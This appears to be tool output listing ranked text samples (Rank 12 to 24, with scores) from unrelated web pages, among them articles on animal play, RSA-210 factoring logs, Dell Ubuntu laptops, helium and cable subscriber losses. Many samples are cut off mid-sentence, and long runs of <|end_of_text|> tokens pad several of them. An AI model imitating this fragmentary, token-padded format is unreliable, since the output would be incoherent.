><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 12; Score = 786432.0 +<|begin_of_text|>Recess + +Fish, reptiles, and even some invertebrates appear to play. But when is it play, and not something else? And why do animals do it? + +During a visit to the National Zoo in Washington, DC, biopsychologist Gordon Burghardt decided to peek in on a Nile soft-shelled turtle its keepers affectionately called “Pigface.” Pigface had been a zoo resident for more than 50 years, and Burghardt had seen him before, but this time, he noticed something a bit curious—Pigface was playing basketball. + +“It was by itself,” recalls Burghardt, currently at the University of Tennessee in Knoxville, and “it had started to knock around” a basketball provided by its keepers. The year was 1994, and play had only rarely and anecdotally been reported in animals other than mammals, but he thought that might be what Pigface was doing. The 1-meter-long turtle exuberantly pushed the ball around its aquatic enclosure, swimming through the water with ease as it batted the ball in front of it with its nose. “If you saw a dog or an otter going around batting a ball, bouncing around and chasing it, and going back and forth and doing it over and over again, we’d have no problem calling it play,” he says. “And that’s what the turtle was doing.” + +More recently, ethologist Jennifer Mather of the University of Lethbridge in Canada learned that two of her octopus research subjects had repeatedly blown jet streams of water at floating empty pill bottles, shooting them across the surface of their tanks at the Seattle Aquarium. “If you give an [octopus] something new, it will grab it in its arms and bring it up to its mouth, probably exploring it chemically,” she says. This would usually happen a couple of times, she adds, until it “knew what it was, and didn’t bother anymore. But these two, it’s like they suddenly thought, ‘Maybe I can do something with this.’ ” + +For Burghardt and Mather and most researchers who have witnessed such bizarre activities in reptiles, fish, and even invertebrates, it is clear that these animals engage in some form of play. But not everyone is convinced. “I personally doubt it,” says behavioral physiologist Bernd Heinrich of the University of Vermont. “I personally have never seen anything I’d call ‘play’ in turtles and was +================================================================================ +Rank = 13; Score = 761856.0 +<|begin_of_text|>5 + +Remove the nozzle from the pump and insert it into the fuel filler opening. Pull the handle inside the nozzle upward to release the gas into your tank. The nozzle may have a trigger-lock feature that holds the handle in place while fueling to prevent having to stand and hold it. Once the tank is full, the gas pump will shut off with a click and gas will stop flowing. If you do not intend to completely fill your tank, you will have to watch the pump to see when you have reached the desired dollar amount of gasoline and then release the handle, or stop the automatic flow by pulling up on the handle to release it. Replace the nozzle back on the pump, reattach your fuel filler cap, shut the fuel filler door and you’re on the road again.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 14; Score = 761856.0 +<|begin_of_text|>ryanp + +Jun 2012 San Mateo, CA + +24×32 Posts + +RSA-210 factored + +RSA-210 has been factored by GNFS. The 210-digit composite + +Code: N = 245246644900278211976517663573088018467026787678332759743414451715061600830038587216952208399332071549103626827191679864079776723243005600592035631246561218465817904100131859299619933817012149335034875870551067 + +Code: Thu Sep 26 07:17:57 2013 prp105 factor: 435958568325940791799951965387214406385470910265220196318705482144524085345275999740244625255428455944579 Thu Sep 26 07:17:57 2013 prp105 factor: 562545761726884103756277007304447481743876944007510545104946851094548396577479473472146228550799322939273 + +Code: Mon Sep 23 11:09:41 2013 commencing Lanczos iteration (32 threads) Mon Sep 23 11:09:41 2013 memory use: 26956.9 MB Mon Sep 23 11:10:27 2013 restarting at iteration 1026631 (dim = 64920012) Mon Sep 23 11:13:33 2013 linear algebra at 99.3%, ETA 15h43m Mon Sep 23 11:14:32 2013 checkpointing every 30000 dimensions Tue Sep 24 02:21:56 2013 lanczos halted after 1033963 iterations (dim = 65383602) Tue Sep 24 02:24:01 2013 recovered 22 nontrivial dependencies Tue Sep 24 02:24:17 2013 BLanczosTime: 55712 Tue Sep 24 02:24:17 2013 elapsed time 15:28:33 Tue Sep 24 03:21:13 2013 Tue Sep 24 03:21:13 2013 Tue Sep 24 03:21:13 2013 Msieve v. 1.52 (SVN 936M) Tue Sep 24 03:21:13 2013 random seeds: +================================================================================ +Rank = 15; Score = 757760.0 +<|begin_of_text|>Share + +We know they resemble miniature shower heads, or perhaps a pair of rather fetching earrings; we know they incorporate dual optical sensors so they can automatically pause and play music; we know they come with dual microphones and a battery that should keep them powered for up to five hours on a single charge; and we know they’ll empty our wallet of $159 should we decide they’re the perfect fit for our shiny new iPhone 7. + +What we don’t know, however, is whether they’ll keep slipping out of our ears. + +Costing as much as they do, the sensation of one of the earpieces slipping from our ear is likely to be as scary as it is annoying. Conan O’Brien, evidently aware of such concerns, this week came up with an amusing spoof ad (above) that draws its inspiration from those classic Apple commercials broadcast around 10 years ago. O’Brien clearly believes the AirPods are set to become a real money-spinner for the Cupertino company – so long as people keep losing them. + +Questioned on the burning issue during an appearance on Good Morning America this week, Apple CEO Tim Cook insisted that up to now, when trying out the AirPods, they’ve not once dropped out. + +“I’ve been on treadmills, walking, doing all the things you normally do … and I have never personally had one fall out” Cook said, adding that “snipping the wires” actually makes them more secure than wired alternatives as they don’t get caught on things or slip out through their own weight. + +The iPhone 7 launches today, but we won’t find out how secure the AirPods are till the end of next month, which is when they go on sale.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 16; Score = 720896.0 +<|begin_of_text|>Share + +Dell has never been shy about offering Linux on its devices in order to make fans of the OS happy while shaving a few bucks off the full price. The savings come from users not needing to spend money on the Windows license. Two of the company’s latest models are getting the same treatment with Dell rolling out an XPS 13 and M3800 Developer Edition, both of which come with Ubuntu 14.04.1 installed. + +The M3800 with Ubuntu is available now, and getting rid of Windows 8.1 carves a savings of $101.50 from the price tag. This means the starting price is $1533.50, which is certainly not cheap, but for users planning to replace Windows with Linux anyway, not being forced to spend extra for the OS is a solid deal. + +One major complaint users had about Dell’s previous Ubuntu offering, the XPS 13 Developer Edition, was that they wanted a larger, more powerful model, and Dell is delivering here. The M3800’s 15.6 inch display features a UHD resolution of 3,840 × 2,160. That’s powered by a fourth generation Intel Core i7 quad-core processor, up to 16GB of RAM and NVIDIA Quadro K1100M graphics. + +A minor issue users will have with the Ubuntu version is the fact 14.04.1 does not support the M3800’s Thunderbolt 2.o port. However, Dell is promising that with the upcoming Ubuntu 14.04.2 release, support for it will be added, so users will only have to deal with not having access to the port for a short period of time. + +As for the XPS 13, Dell has not started selling the newest Linux-toting model as of this writing. In a Dell blog post, the company said that the fourth generation XPS 13 will be available soon, though it did not offer an exact release date for the updated version. + +A key selling point of both models is their size, as the XPS 13 starts at a very light 2.6 pounds, and the larger M3800’s base weight is just 4.7 pounds. Those light specifications are maintained on the Ubuntu-based models. No word on how the switch impacts battery life, however.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 17; Score = 716800.0 +<|begin_of_text|>1. The Camels Four tasmanian camels traveling on a very narrow ledge encounter four tasmanian camels coming the other way. As everyone knows, tasmanian camels never go backwards, especially when on a precarious ledge. The camels will climb over each other, but only if there is a camel sized space on the other side. The camels didn't see each other until there was only exactly one camel's width between the two groups. How can all camels pass, allowing both groups to go on their way, without any camel reversing? Show Hint Show Solution Hint: Use match sticks or coins to simulate the puzzle. Solution: First a camel from one side moves forward, then two camels from the other side move forward, then three camels from the first side move forward etc... + +etc... + +2. The Waiter Three men in a cafe order a meal the total cost of which is $15. They each contribute $5. The waiter takes the money to the chef who recognizes the three as friends and asks the waiter to return $5 to the men. The waiter is not only poor at mathematics but dishonest and instead of going to the trouble of splitting the $5 between the three he simply gives them $1 each and pockets the remaining $2 for himself. Now, each of the men effectively paid $4, the total paid is therefore $12. Add the $2 in the waiters pocket and this comes to $14.....where has the other $1 gone from the original $15? Show Solution Solution: The payments should equal the receipts. It does not make sense to add what was paid by the men ($12) to what was received from that payment by the waiter ($2) Although the initial bill was $15 dollars, one of the five dollar notes gets changed into five ones. The total the three men ultimately paid is $12, as they get three ones back. So from the $12 the men paid, the owner receives $10 and the waiter receives the $2 difference. $15 - $3 = $10 + $2. + +3. The Boxes There are three boxes. One is labeled "APPLES" another is labeled "ORANGES". The last one is labeled "APPLES AND ORANGES". You know that each is labeled incorrectly. You may ask me to pick one fruit from one box which you choose. How can you label the boxes correctly? Show Solution Solution: Pick from the one labeled "Apples & Oranges". This box must contain either +================================================================================ +Rank = 18; Score = 692224.0 +<|begin_of_text|>Tibetan spiritual leader was permitted by India to visit various areas in the north- east, including Arunachal Pradesh, + + +BEIJING: China today warned that it would consider as a "major offence" if any country or foreign leader hosts or meets the Dalai Lama as it deems the Tibetan spiritual leader a "separatist" trying to split Tibet from it.China routinely protests world leaders meeting the Dalai Lama. It also makes it mandatory for all the foreign governments to recognise Tibet as part of China to have diplomatic relations with Beijing.It also protested that when thethis year.The Dalai Lama fled Tibet in 1959 after a failed uprising against the Chinese rule in his Himalayan homeland. He has been living in India in exile since then."Any country or any organisation of anyone to accept to meet with the Dalai Lama in our view is a major offence to the sentiment of the Chinese people," said Zhang Yijiong, Executive Vice Minister of the United Front Work Department of the ruling Communist Party of China (CPC)."Also, since they have committed to recognising China as a sole legitimate government representing China it contravenes their attempt, because it is a serious commitment," Zhang said on the sidelines of the once-in-a-five-year congress of the CPC.Zhang said China would not accept the arguments of foreign countries and leaders to meet the 82-year-old Dalai Lama as a religious leader."I want to make it clear that the 14th Dalai Lama, the living Buddha handed down by history is a political figure under the cloak of religion," he said.Without naming India, he said Dalai Lama fled to the "other country" in 1959 "betraying his motherland and setup his so called government in exile".That "so called government" has the mission of a separatist agenda to split Tibet from China, he said."For decades, the group with 14th Dalai Lama as the leader never stopped to achieve that political agenda," he said.There is no legitimate government that that has recognised the Dalai Lama group, he said, adding that fewer countries and leaders are hosting him.Some countries may say the Dalai Lama is not a political figure but a religious figure and their officials meet him not in his political capacity."But that is not true and not right because every official represent their government and they are political figures," Zhang said."So we urge all to exercise caution and prudence to bear in mind the respect for China's sovereignty and for their +================================================================================ +Rank = 19; Score = 655360.0 +<|begin_of_text|>7 + +Put In Bay, OH 43456 + +(419) 285-2112 + +Started camping here in 2010 and immediately fell in love with the place. SBISP is the best deal on PIB, hotels/houses are very expensive to book, so camping is a great alternative. I am unsure how the crowd is during the week at the SBISP, but during the weekends they are packed. Christmas in July is ALWAYS sold out, so if you plan to camp during that weekend you have to book 6 months in advance. (trust me) Price for camping is very reasonable, basically $65/ campsite, but when you factor in price per person it is around $10/person. Everyone that is staying there is there to party, quiet time is after 10pm. Alcohol, though it states you cannot drink, everyone does, just put it in a red solo cup, the rangers are extremely cool as long as you show them respect, and remember to clean up prior to leaving. SBISP has remained successful because people respect the rules, by doing this, authority figures allow some of the rules to be bent, i.e. drinking. They say 6 people per campsite, and I believe 2 or 3 tents per site, honestly, I have never had a problem, I've rented two sites next to each other with almost 20 people total staying there along with 8 tents set up, again, respect the rules and they look the other way on small things. Bathrooms are alright, remind me of a typical park bathroom, this isn't the Ritz Carlton, but they do have outlets in the bathrooms. Showers have hardly any pressure, but are manageable. They now allow two cars per pad, (extra fee for second car) Campfire wood is few and far between, (you cannot bring wood over from the mainland), you can however purchase some. Only one cab company runs inside SBISP, others pickup/drop-off at the entrance into the grounds. One of the cool things (safety) is that late night dropoffs (1am+), you are greeted by an officer checking to see who you are and where exactly you are staying in SBISP. He is extremely friendly and is just doing his job to keep any unwelcome guest from disturbing the campers, show him some respect. In summary; SBISP is a great cheap alternative that still boast all the same amenities that any other part of the island would offer. I would not think twice +================================================================================ +Rank = 20; Score = 638976.0 +<|begin_of_text|>Share + +Whether it was your favorite toy or the last portion of mashed potatoes, anyone who grew up with a sibling knows that you learn to forcefully stake your claim to what’s rightfully yours. + +It turns out that a similar idea can be applied to robots. + +In a new piece of research — presented at the recent 2017 International Conference on Robotics and Automation (ICRA) — engineers from Google and Carnegie Mellon University demonstrated that robots learn to grasp objects more robustly if another robot can be made to try and snatch it away from them while they’re doing so. + +When one robot is given the task of picking up an object, the researchers made its evil twin (not that they used those words exactly) attempt to grab it from them. If the object isn’t properly held, the rival robot would be successful in its snatch-and-grab effort. Over time, the first robot learns to more securely hold onto its object — and with a vastly accelerated learning time, compared to working this out on its own. + +“Robustness is a challenging problem for robotics,” Lerrel Pinto, a PhD student at Carnegie Mellon’s Robotics Institute told Digital Trends. “You ideally want a robot to be able to transfer what it has learnt to environments that it hasn’t seen before, or even be stable to risks in the environment. Our adversarial formulation allows the robot to learn to adapt to adversaries, and this could allow the robot to work in new environments.” + +The work uses deep learning technology, as well as insights from game theory: the mathematical study of conflict and cooperation, in which one party’s gain can mean the other party’s loss. In this case, a successful grab from the rival robot is recorded as a failure for the robot it grabbed the object from — which triggers a learning experience for the loser. Over time, the robots’ tussles make each of them smarter. + +That sounds like progress — just as long as the robots don’t eventually form a truce and target us with their adversarial AI, we guess!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 21; Score = 634880.0 +<|begin_of_text|>Share + +Thereport highlights how global risks are not only interconnected but also have systemic impacts. To manage global risks effectively and build resilience to their impacts, better efforts are needed to understand, measure and foresee the evolution of interdependencies between risks, supplementing traditional risk-management tools with new concepts designed for uncertain environments. If global risks are not effectively addressed, their social, economic and political fallouts could be far-reaching, as exemplified by the continuing impacts of the financial crisis of 2007-2008. + +The systemic nature of our most significant risks calls for procedures and institutions that are globally coordinated yet locally flexible. As international systems of finance, supply chains, health, energy, the Internet and the environment become more complex and interdependent, their level of resilience determines whether they become bulwarks of global stability or amplifiers of cascading shocks. Strengthening resilience requires overcoming collective action challenges through international cooperation among business, government and civil society. + +Box 1: Objectives of the Global Risks 2014 Report The world faces risks that can be addressed only by long-term thinking and collaboration among business, governments and civil society. The Global Risks 2014 report aims to support this process by: exploring the nature of systemic risks + +mapping 31 global risks according to the level of concern they arouse, their likelihood and potential impact, as well as the strength of the interconnections between them + +looking in-depth at the ways in which three constellations of global risk – centred on youth, cyberspace and geopolitics – could interplay and have systemic impact + +Mapping Global Risks in 2014 + +Based on a survey of the World Economic Forum’s multistakeholder communities, the report maps 31 global risks according to level of concern, likelihood and impact and interconnections among them. + +The risks of highest concern to respondents are fiscal crises in key economies, structurally high unemployment and underemployment, and water crises (Table 1). + +Table 1: Ten Global Risks of Highest Concern in 2014 + +No. Global Risk 1 Fiscal crises in key economies 2 Structurally high unemployment/underemployment 3 Water crises 4 Severe income disparity 5 Failure of climate change mitigation and adaptation 6 Greater incidence of extreme weather events (e.g. floods, storms, fires) 7 Global governance failure 8 Food crises 9 Failure of a major financial mechanism/institution 10 Profound political and social instability + +Source: Global Risks Perception Survey 2013-2014. +================================================================================ +Rank = 22; Score = 618496.0 +<|begin_of_text|>It's Elemental + +The Element Helium + +[Click for Isotope Data] + +2 He Helium 4.002602 Atomic Number: 2 Atomic Weight: 4.002602 Melting Point: 0.95 K (-272.2°C or -458.0°F) Boiling Point: 4.22 K (-268.93°C or -452.07°F) Density: 0.0001785 grams per cubic centimeter Phase at Room Temperature: Gas Element Classification: Non-metal Period Number: 1 Group Number: 18 Group Name: Noble Gas + +What's in a name? For the Greek god of the sun, Helios. + +Say what? Helium is pronounced as HEE-lee-em. + +History and Uses: + +Helium, the second most abundant element in the universe, was discovered on the sun before it was found on the earth. Pierre-Jules-César Janssen, a French astronomer, noticed a yellow line in the sun's spectrum while studying a total solar eclipse in 1868. Sir Norman Lockyer, an English astronomer, realized that this line, with a wavelength of 587.49 nanometers, could not be produced by any element known at the time. It was hypothesized that a new element on the sun was responsible for this mysterious yellow emission. This unknown element was named helium by Lockyer. + +The hunt to find helium on earth ended in 1895. Sir William Ramsay, a Scottish chemist, conducted an experiment with a mineral containing uranium called clevite. He exposed the clevite to mineral acids and collected the gases that were produced. He then sent a sample of these gases to two scientists, Lockyer and Sir William Crookes, who were able to identify the helium within it. Two Swedish chemists, Nils Langlet and Per Theodor Cleve, independently found helium in clevite at about the same time as Ramsay. + +Helium makes up about 0.0005% of the earth's atmosphere. This trace amount of helium is not gravitationally bound to the earth and is constantly lost to space. The earth's atmospheric helium is replaced by the decay of radioactive elements in the earth's crust. Alpha decay, one type of radioactive decay, produces particles called alpha particles. An alpha particle can become a helium atom once it captures two electrons from its surroundings. This newly formed helium can eventually work its way to the atmosphere through cracks in the crust. + +Helium is commercially recovered from natural +================================================================================ +Rank = 23; Score = 618496.0 +<|begin_of_text|>+ 14 + +Architects Eisenman Architects + +Location Santiago de Compostela, Spain + +Category Cultural Center + +Executive Architect Andres Perea Ortega and euroestudios + +Client Fundación cidade da cultura de Galicia + +Project Year 2011 + +Photographs Duccio Malagamba + +Text description provided by the architects. The City of Culture is a new cultural center for the Province of Galicia in northwestern Spain. Its design evolves from the superposition of three sets of information. First, the street plan of the medieval center of Santiago is overlaid on a topographic map of the hillside site, which overlooks the city. Second, a modern Cartesian grid is laid over these medieval routes. Third, through computer modeling software, the topography of the hillside is allowed to distort the two flat geometries, thus generating a topological surface that repositions old and new in a simultaneous matrix never before seen. + +The original center of Santiago conforms to a figure/ground urbanism in which buildings are figural, or solid, and the streets are residual, or void spaces. Through this mapping operation, the project emerges as a curving surface that is neither figure nor ground but both a figured ground and a figured figure that supersede the figure-ground urbanism of the old city. Santiago’s medieval past appears not as a form of representational nostalgia but as a new yet somehow familiar presence found in a new form. + +The six buildings of the project are conceived as three pairs: the Museum of Galicia and the International Art Center; the Center for Music and Performing Arts and the Central Services building; and the Library of Galicia and the Galician Archives. Visitors’ experiences of any given building will be affected by its relationship to its immediate partner. The caminos, or pedestrian streets, between the buildings also open onto a public plaza, which is bordered by the six buildings and features landscape and water elements. The largest building is the Performing Arts Theater, which will stand 42.5 meters high. The heights of all of the buildings rise in gentle curves that seem to reconstruct the shape of the hilltop with their collective rooflines, which are all clad in stone and marked with the grids that inform the design of the site. + +The Library of Galicia and Galician Archives opened their doors on January 11, 2011, during a ceremony presided over by the Prince and Princess of Asturias. The 17,372-square-meter Library will accommodate one million books in open stacks, rare book archives, +================================================================================ +Rank = 24; Score = 606208.0 +<|begin_of_text|>Share + +The 13 largest multi-channel video providers in the U.S. (Comcast, DirecTV and Verizon FiOS, to name three), who make up roughly 94 percent of the market share, lost about 105,000 video subscribers in 2013 — a wide 280,000-subscriber swing from 2012’s addition of 175,000. Perhaps most directly responsible for this first-ever net loss is the increasingly out-of-control hemorrhaging of subscribers on the part of top cable companies: about 1.7 million customers cut their cords in 2013. + +Despite the loss equaling only 0.1 percent of all subscribers, 2013 nonetheless marks the first year in which pay-TV giants actually came out with an overall year-end loss, according to a recent report by Leichtman Research Group. Cord-cutters the world over are muttering, “You have to start somewhere.” + +Specifically, cable companies took the biggest hit — technically, the only hit to actually result in a net loss. + +Top telephone service providers AT&T U-verse and Verizon FiOS, along with top satellite TV companies DirecTV and DISH, added a total of roughly 1.6 million new video subscribers in 2013; a total that counteracts the 1.7 million lost cable video subscribers. Thus, the total amount of subscribers among all top multi-channel video providers fell for the first time, by about 105,000, which, in the grand scheme of things, isn’t all that much. There are about 94.6 million total subscribers currently at stake with the aforementioned multi-channel video providers. + +While the loss is far from monumental, it could be interpreted as a sign of the times. Those that are wary of the recent moves by big pay-TV players, such as the Comcast-Time Warner merge, may find solace in this report. Though it should be expected that any big changes will be incremental, It’s like trying to make a 180-degree turn with the Titanic: there might not appear to be any considerable progress at any one time, but it’s turning — slowly but 